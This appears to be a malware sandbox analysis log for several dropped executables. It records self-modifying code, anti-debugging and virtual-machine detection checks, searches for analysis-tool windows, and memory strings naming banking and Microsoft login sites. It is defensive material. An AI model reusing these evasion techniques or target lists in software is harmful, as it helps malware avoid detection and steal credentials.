Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exe	Special instruction interceptor: First address: 83FB7D instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exe	Special instruction interceptor: First address: 9E4AB0 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exe	Special instruction interceptor: First address: A72DFE instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exe	Special instruction interceptor: First address: 9E46FC instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1018748001\d5cd5e4aa8.exe	Special instruction interceptor: First address: 81CA7C instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1018748001\d5cd5e4aa8.exe	Special instruction interceptor: First address: 9B9AC9 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1018748001\d5cd5e4aa8.exe	Special instruction interceptor: First address: 9B8A37 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1018748001\d5cd5e4aa8.exe	Special instruction interceptor: First address: 9B85F0 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	Special instruction interceptor: First address: 957B7B instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	Special instruction interceptor: First address: 9550BE instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	Special instruction interceptor: First address: AFE5A5 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	Special instruction interceptor: First address: B84384 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe	Special instruction interceptor: First address: 116F9B7 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe	Special instruction interceptor: First address: 133ED83 instructions caused by: Self-modifying code

Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_04C90C79 rdtsc

0_2_04C90C79

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window / User API: threadDelayed 4732	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window / User API: threadDelayed 3548	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2238
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4433
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4763
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2825
Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exe	Window / User API: threadDelayed 1175
Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exe	Window / User API: threadDelayed 1169
Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exe	Window / User API: threadDelayed 1207
Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exe	Window / User API: threadDelayed 1187
Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exe	Window / User API: threadDelayed 1193
Source: C:\Users\user\AppData\Local\Temp\1018748001\d5cd5e4aa8.exe	Window / User API: threadDelayed 1269
Source: C:\Users\user\AppData\Local\Temp\1018748001\d5cd5e4aa8.exe	Window / User API: threadDelayed 1264
Source: C:\Users\user\AppData\Local\Temp\1018748001\d5cd5e4aa8.exe	Window / User API: threadDelayed 1137
Source: C:\Users\user\AppData\Local\Temp\1018748001\d5cd5e4aa8.exe	Window / User API: threadDelayed 1246
Source: C:\Users\user\AppData\Local\Temp\1018748001\d5cd5e4aa8.exe	Window / User API: threadDelayed 1261
Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe	Window / User API: threadDelayed 1234
Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe	Window / User API: threadDelayed 1195
Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe	Window / User API: threadDelayed 1245
Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe	Window / User API: threadDelayed 1227
Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe	Window / User API: threadDelayed 1223
Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe	Window / User API: threadDelayed 1235
Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe	Window / User API: threadDelayed 1237
Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe	Window / User API: threadDelayed 1225

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\random[2].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1018751001\0a99277d48.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1018743001\c359af6492.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\main\7z.dll	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\main\7z.exe

API coverage: 5.1 %

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7432	Thread sleep count: 109 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7432	Thread sleep time: -218109s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7276	Thread sleep count: 110 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7276	Thread sleep time: -220110s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7420	Thread sleep count: 249 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7420	Thread sleep time: -7470000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7504	Thread sleep count: 4732 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7504	Thread sleep time: -9468732s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7564	Thread sleep count: 108 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7564	Thread sleep time: -216108s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5792	Thread sleep count: 108 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5792	Thread sleep time: -216108s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7504	Thread sleep count: 3548 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7504	Thread sleep time: -7099548s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6716	Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6252	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5692	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1364	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exe TID: 7600	Thread sleep time: -2351175s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exe TID: 7316	Thread sleep time: -2339169s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exe TID: 3620	Thread sleep time: -36000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exe TID: 7292	Thread sleep time: -2415207s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exe TID: 352	Thread sleep time: -50000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exe TID: 7300	Thread sleep time: -2375187s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exe TID: 7312	Thread sleep time: -2387193s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1018748001\d5cd5e4aa8.exe TID: 6268	Thread sleep count: 1269 > 30
Source: C:\Users\user\AppData\Local\Temp\1018748001\d5cd5e4aa8.exe TID: 6268	Thread sleep time: -2539269s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1018748001\d5cd5e4aa8.exe TID: 3728	Thread sleep count: 1264 > 30
Source: C:\Users\user\AppData\Local\Temp\1018748001\d5cd5e4aa8.exe TID: 3728	Thread sleep time: -2529264s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1018748001\d5cd5e4aa8.exe TID: 3972	Thread sleep time: -40000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1018748001\d5cd5e4aa8.exe TID: 3328	Thread sleep count: 1137 > 30
Source: C:\Users\user\AppData\Local\Temp\1018748001\d5cd5e4aa8.exe TID: 3328	Thread sleep time: -2275137s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1018748001\d5cd5e4aa8.exe TID: 4632	Thread sleep count: 1246 > 30
Source: C:\Users\user\AppData\Local\Temp\1018748001\d5cd5e4aa8.exe TID: 4632	Thread sleep time: -2493246s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1018748001\d5cd5e4aa8.exe TID: 2448	Thread sleep count: 1261 > 30
Source: C:\Users\user\AppData\Local\Temp\1018748001\d5cd5e4aa8.exe TID: 2448	Thread sleep time: -2523261s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe TID: 2388	Thread sleep time: -48024s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe TID: 2456	Thread sleep time: -50025s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe TID: 8180	Thread sleep time: -32000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe TID: 8124	Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe TID: 2396	Thread sleep time: -34017s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe TID: 3112	Thread sleep time: -44022s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe TID: 5140	Thread sleep count: 1234 > 30
Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe TID: 5140	Thread sleep time: -2469234s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe TID: 3180	Thread sleep count: 1195 > 30
Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe TID: 3180	Thread sleep time: -2391195s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe TID: 7164	Thread sleep count: 1245 > 30
Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe TID: 7164	Thread sleep time: -2491245s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe TID: 2084	Thread sleep time: -36000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe TID: 5920	Thread sleep count: 1227 > 30
Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe TID: 5920	Thread sleep time: -2455227s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe TID: 5680	Thread sleep count: 1223 > 30
Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe TID: 5680	Thread sleep time: -2447223s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe TID: 1708	Thread sleep count: 1235 > 30
Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe TID: 1708	Thread sleep time: -2471235s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe TID: 1320	Thread sleep count: 1237 > 30
Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe TID: 1320	Thread sleep time: -2475237s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe TID: 3280	Thread sleep count: 1225 > 30
Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe TID: 3280	Thread sleep time: -2451225s >= -30000s

Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\PING.EXE	Last function: Thread delayed
Source: C:\Windows\System32\PING.EXE	Last function: Thread delayed

Source: C:\Users\user\Desktop\file.exe	File Volume queried: C:\ FullSizeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exe	File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\AppData\Local\Temp\main\7z.exe

Code function: 20_2_00977978 FindFirstFileW,FindFirstFileW,free,

20_2_00977978

Source: C:\Users\user\AppData\Local\Temp\main\7z.exe

Code function: 20_2_0097881C free,free,GetLogicalDriveStringsW,GetLogicalDriveStringsW,free,free,free,

20_2_0097881C

Source: C:\Users\user\AppData\Local\Temp\main\7z.exe

Code function: 20_2_0097B5E0 GetSystemInfo,

20_2_0097B5E0

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread delayed: delay time: 30000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\main\extracted	Jump to behavior
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\	Jump to behavior
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\Local\	Jump to behavior
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\	Jump to behavior
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\main\	Jump to behavior
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\	Jump to behavior

Source: skotes.exe, skotes.exe, 00000004.00000002.2314342994.0000000001132000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000004.00000000.2253099995.0000000001132000.00000080.00000001.01000000.00000007.sdmp, skotes.exe, 0000000E.00000000.2738793459.0000000001132000.00000080.00000001.01000000.00000007.sdmp, d5cd5e4aa8.exe, 0000002E.00000002.4002520006.000000000099C000.00000040.00000001.01000000.00000011.sdmp, ea17d0b77a.exe, 0000002F.00000003.3623331328.0000000005FB5000.00000004.00000800.00020000.00000000.sdmp, file.exe	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: ea17d0b77a.exe, 0000002F.00000003.3315305813.00000000059D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
Source: ea17d0b77a.exe, 0000002F.00000003.3315305813.00000000059D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696487552\|UE
Source: ea17d0b77a.exe, 0000002F.00000003.3315305813.00000000059D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
Source: ea17d0b77a.exe, 0000002F.00000003.3315305813.00000000059D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696487552f
Source: ea17d0b77a.exe, 0000002F.00000003.3315305813.00000000059D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696487552x
Source: ea17d0b77a.exe, 0000002F.00000003.3315305813.00000000059D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
Source: file.exe	Binary or memory string: ventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: explorer.exe, 00000028.00000002.3026870349.000000000086B000.00000004.00000020.00020000.00000000.sdmp, d5cd5e4aa8.exe, 0000002E.00000002.4018413567.0000000000FF4000.00000004.00000020.00020000.00000000.sdmp, d5cd5e4aa8.exe, 0000002E.00000002.4041357716.00000000055F3000.00000004.00000020.00020000.00000000.sdmp, d5cd5e4aa8.exe, 0000002E.00000003.3718296864.0000000000FF4000.00000004.00000020.00020000.00000000.sdmp, d5cd5e4aa8.exe, 0000002E.00000003.3780362783.0000000000FF4000.00000004.00000020.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3539294349.000000000108C000.00000004.00000020.00020000.00000000.sdmp, 9434b989db.exe, 00000030.00000002.4214117571.00000000007CF000.00000004.00000020.00020000.00000000.sdmp, 9434b989db.exe, 00000030.00000002.4214117571.00000000007A4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: ea17d0b77a.exe, 0000002F.00000003.3315305813.00000000059D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696487552
Source: 352def4414.exe, 0000002D.00000003.3055975665.0000000007180000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: SYSINTERNALSNum_processorNum_ramnameallfreedriversNum_displaysresolution_xresolution_y\recent_filesprocessesuptime_minutesC:\Windows\System32\VBox.dll01vbox_firstSYSTEM\ControlSet001\Services\VBoxSFvbox_secondC:\USERS\PUBLIC\public_checkWINDBG.EXEdbgwireshark.exeprocmon.exex64dbg.exeida.exedbg_secdbg_thirdyadroinstalled_appsSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall%d%s\%sDisplayNameapp_nameindexCreateToolhelp32Snapshot failed.
Source: ea17d0b77a.exe, 0000002F.00000003.3315305813.00000000059D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
Source: ea17d0b77a.exe, 0000002F.00000003.3315305813.00000000059D5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: - GDCDYNVMware20,11696487552p
Source: ea17d0b77a.exe, 0000002F.00000003.3315305813.00000000059D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
Source: ea17d0b77a.exe, 0000002F.00000003.3315305813.00000000059D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696487552
Source: ea17d0b77a.exe, 0000002F.00000003.3315305813.00000000059D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696487552o
Source: ea17d0b77a.exe, 0000002F.00000003.3315305813.00000000059D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696487552
Source: PING.EXE, 00000026.00000002.3036848767.0000025FD786D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll#
Source: ea17d0b77a.exe, 0000002F.00000003.3315305813.00000000059D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
Source: PING.EXE, 0000002B.00000002.3060586838.0000024E3AE59000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllkk
Source: ea17d0b77a.exe, 0000002F.00000003.3315305813.00000000059D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696487552
Source: ea17d0b77a.exe, 0000002F.00000003.3315305813.00000000059D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696487552j
Source: ea17d0b77a.exe, 0000002F.00000003.3315305813.00000000059D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
Source: ea17d0b77a.exe, 0000002F.00000003.3315305813.00000000059D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
Source: 352def4414.exe, 0000002D.00000003.3055975665.0000000007180000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: SYSTEM\ControlSet001\Services\VBoxSF
Source: ea17d0b77a.exe, 0000002F.00000003.3315305813.00000000059D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
Source: ea17d0b77a.exe, 0000002F.00000003.3315305813.00000000059D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
Source: ea17d0b77a.exe, 0000002F.00000003.3315305813.00000000059D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
Source: ea17d0b77a.exe, 0000002F.00000003.3315305813.00000000059D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
Source: ea17d0b77a.exe, 0000002F.00000003.3315305813.00000000059D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696487552t
Source: ea17d0b77a.exe, 0000002F.00000003.3315305813.00000000059D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
Source: 9434b989db.exe, 00000030.00000002.4214117571.000000000075E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: ea17d0b77a.exe, 0000002F.00000003.3315305813.00000000059D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
Source: ea17d0b77a.exe, 0000002F.00000003.3315305813.00000000059D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
Source: ea17d0b77a.exe, 0000002F.00000003.3315305813.00000000059D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696487552s
Source: ea17d0b77a.exe, 0000002F.00000003.3315305813.00000000059D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
Source: ea17d0b77a.exe, 0000002F.00000003.3315305813.00000000059D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696487552t
Source: ea17d0b77a.exe, 0000002F.00000003.3315305813.00000000059D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
Source: file.exe, 00000000.00000002.2263469671.0000000000D22000.00000040.00000001.01000000.00000003.sdmp, skotes.exe, 00000003.00000002.2303675886.0000000001132000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000004.00000002.2314342994.0000000001132000.00000040.00000001.01000000.00000007.sdmp, d5cd5e4aa8.exe, 0000002E.00000002.4002520006.000000000099C000.00000040.00000001.01000000.00000011.sdmp, ea17d0b77a.exe, 0000002F.00000003.3623331328.0000000005FB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: ea17d0b77a.exe, 0000002F.00000003.3315305813.00000000059D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
Source: ea17d0b77a.exe, 0000002F.00000003.3315305813.00000000059D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
Source: 352def4414.exe, 0000002D.00000003.3089465558.0000000006741000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Y\MACHINE\SYSTEM\ControlSet001\Services\VBoxSFlM!

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	API call chain: ExitProcess graph end node			graph_3-9994
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	API call chain: ExitProcess graph end node			graph_3-10015

Source: C:\Users\user\Desktop\file.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\file.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1018748001\d5cd5e4aa8.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe	Thread information set: HideFromDebugger

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe	Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe	Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe	Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe	File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe	File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe	File opened: SIWVID

Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exe

System information queried: KernelDebuggerInformation

Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
